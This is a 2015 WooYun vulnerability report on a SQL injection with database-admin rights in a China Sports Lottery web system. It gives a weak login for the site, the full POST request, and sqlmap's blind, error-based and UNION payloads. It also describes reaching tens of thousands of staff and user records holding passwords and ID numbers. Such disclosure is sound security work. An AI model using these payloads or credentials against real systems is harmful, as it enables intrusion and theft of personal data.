当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161360

漏洞标题:中国体育彩票某系统sa权限MSSQL注入(涉及12W用户信息)

相关厂商:cnsportslottery.cn

漏洞作者: Looke

提交时间:2015-12-17 15:39

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-17: 厂商已经确认,细节仅向厂商公开
2015-12-27: 细节向核心白帽子及相关领域专家公开
2016-01-06: 细节向普通白帽子公开
2016-01-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

RT

详细说明:

漏洞系统:http://www.cnsportslottery.cn/
弱口令:wangyong 123456
注入点

0.png


漏洞地址:

POST /qdgl/qdgl_jmszz_list.aspx HTTP/1.1
Host: www.cnsportslottery.cn
Proxy-Connection: keep-alive
Content-Length: 788
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.cnsportslottery.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.cnsportslottery.cn/qdgl/qdgl_jmszz_list.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ts4cbi45hpd3swnaeik40155; rqDSv7Yb%2fKI%3d=4isdgEYQyr2llvsuyt8Nk3WtTbkFZ04O; Hm_lvt_535e4ff4a164a77aeb4194229ad0e8b2=1450102286; Hm_lpvt_535e4ff4a164a77aeb4194229ad0e8b2=1450102409
__VIEWSTATE=kr3tnCPoIgEPxdpBU%2BbLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfOwGl0B6hI1%2BW9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY%2BRLx95fcv3vwyqCE6F8G88HfV%2FtJKn7EhqKA4%2BQqu0MrERDuV%2BNgpL3mbnQB6%2FTIs68j8DHHZe73fcZJ3NaeWYJmFZ%2BClS%2BwptfvXVuskBv%2FcZP1xSIK65kLT8LE2%2B1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl%2Fwj%2BH1BrlEXyztGiN8pEBdQg%2FzRalj8s9hWCHeolqjcCSYO2EP%2B0i4n%2BSafZhcV5jsTS2Uauyc1lH2P%2FfxoG%2FoTCkb6pYDjEsc3%2BYudvfC9aQ8GWoCwdcUtkSoLjA%3D%3D&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75%2BAL8%2B5niiYkwPpGdwjXSyrqg0%2B0pPPM7%2BqoTGTZeJa4wZqd%2FzI1fy1udxt9%2Fk1QjSHSGc1Scn%2BTsNrunXamFX%2BcmgmkJM%2BHqcPL%2Fr%2FIroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ%2FAcQ%3D%3D&txtLeagueNum=jc-gs-lz-140112969*&txtCompany=&txtStartTime=&txtEndTime=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF


txtLeagueNum参数存在注入

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=kr3tnCPoIgEPxdpBU+bLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfO
wGl0B6hI1+W9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY+RLx95fcv3vwyqCE6F8G88HfV/tJKn7EhqKA
4+Qqu0MrERDuV+NgpL3mbnQB6/TIs68j8DHHZe73fcZJ3NaeWYJmFZ+ClS+wptfvXVuskBv/cZP1xSIK
65kLT8LE2+1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl/wj+H1BrlEXyzt
GiN8pEBdQg/zRalj8s9hWCHeolqjcCSYO2EP+0i4n+SafZhcV5jsTS2Uauyc1lH2P/fxoG/oTCkb6pYD
jEsc3+YudvfC9aQ8GWoCwdcUtkSoLjA==&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75+AL8
+5niiYkwPpGdwjXSyrqg0+0pPPM7+qoTGTZeJa4wZqd/zI1fy1udxt9/k1QjSHSGc1Scn+TsNrunXamF
X+cmgmkJM+HqcPL/r/IroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ/AcQ==&txtLeagueNum=
jc-gs-lz-140112969%' AND 6537=6537 AND '%'='&txtCompany=&txtStartTime=&txtEndTim
e=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=kr3tnCPoIgEPxdpBU+bLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfO
wGl0B6hI1+W9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY+RLx95fcv3vwyqCE6F8G88HfV/tJKn7EhqKA
4+Qqu0MrERDuV+NgpL3mbnQB6/TIs68j8DHHZe73fcZJ3NaeWYJmFZ+ClS+wptfvXVuskBv/cZP1xSIK
65kLT8LE2+1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl/wj+H1BrlEXyzt
GiN8pEBdQg/zRalj8s9hWCHeolqjcCSYO2EP+0i4n+SafZhcV5jsTS2Uauyc1lH2P/fxoG/oTCkb6pYD
jEsc3+YudvfC9aQ8GWoCwdcUtkSoLjA==&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75+AL8
+5niiYkwPpGdwjXSyrqg0+0pPPM7+qoTGTZeJa4wZqd/zI1fy1udxt9/k1QjSHSGc1Scn+TsNrunXamF
X+cmgmkJM+HqcPL/r/IroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ/AcQ==&txtLeagueNum=
jc-gs-lz-140112969%' AND 2790=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+C
HAR(112)+CHAR(113)+(SELECT (CASE WHEN (2790=2790) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))) AND '%'='&txtCompany=&tx
tStartTime=&txtEndTime=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF
    Type: UNION query
    Title: Generic UNION query (NULL) - 64 columns
    Payload: __VIEWSTATE=kr3tnCPoIgEPxdpBU+bLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfO
wGl0B6hI1+W9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY+RLx95fcv3vwyqCE6F8G88HfV/tJKn7EhqKA
4+Qqu0MrERDuV+NgpL3mbnQB6/TIs68j8DHHZe73fcZJ3NaeWYJmFZ+ClS+wptfvXVuskBv/cZP1xSIK
65kLT8LE2+1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl/wj+H1BrlEXyzt
GiN8pEBdQg/zRalj8s9hWCHeolqjcCSYO2EP+0i4n+SafZhcV5jsTS2Uauyc1lH2P/fxoG/oTCkb6pYD
jEsc3+YudvfC9aQ8GWoCwdcUtkSoLjA==&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75+AL8
+5niiYkwPpGdwjXSyrqg0+0pPPM7+qoTGTZeJa4wZqd/zI1fy1udxt9/k1QjSHSGc1Scn+TsNrunXamF
X+cmgmkJM+HqcPL/r/IroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ/AcQ==&txtLeagueNum=
jc-gs-lz-140112969%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(99)+CHAR(111)+CHAR(99)+
CHAR(88)+CHAR(84)+CHAR(80)+CHAR(74)+CHAR(117)+CHAR(84)+CHAR(102)+CHAR(89)+CHAR(1
13)+CHAR(79)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(65)+CHAR(84)+CHAR(100)+CHAR(88)+C
HAR(84)+CHAR(83)+CHAR(82)+CHAR(66)+CHAR(113)+CHAR(112)+CHAR(82)+CHAR(70)+CHAR(11
1)+CHAR(100)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(76)+CHAR(81)+CHAR(110)+CHAR(66)+
CHAR(80)+CHAR(103)+CHAR(90)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL-- &txtCompany=&txtStartTime=&txtEndTime=&ddlStatus=-
1&btnQuery=%B2%E9%D1%AF
---

漏洞证明:

数据库,当前用户及dba权限:

1.png


大量敏感信息泄漏,

敏感数据泄漏.png


6.4W员工信息手机号、邮箱等等含密码

员工表.png


另外,lot_XSInfo表近6W用户数据,包含姓名、身份证号、手机等敏感信息,仅dump一条数据信息作证明

数据信息.png


声明,仅做测试,未脱库,日志可查,谢绝查水表。

修复方案:

@@

版权声明:转载请注明来源 Looke@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-17 15:48

厂商回复:

非常感谢路人甲同学和乌云平台对中体彩网站的安全测试。发现的漏洞也确实是高危漏洞。该漏洞在不久前的乌云众测中已经发现。但是由于该系统在8年前由代理商开发,现在我公司也没有源代码,实在难以修复。而用户的弱密码是因为彩票网点用户从不登录修改密码所致。新的替换系统正在测试中,估计在16年1月上线替换。届时欢迎白帽子们再来测试。再次感谢!

最新状态:

暂无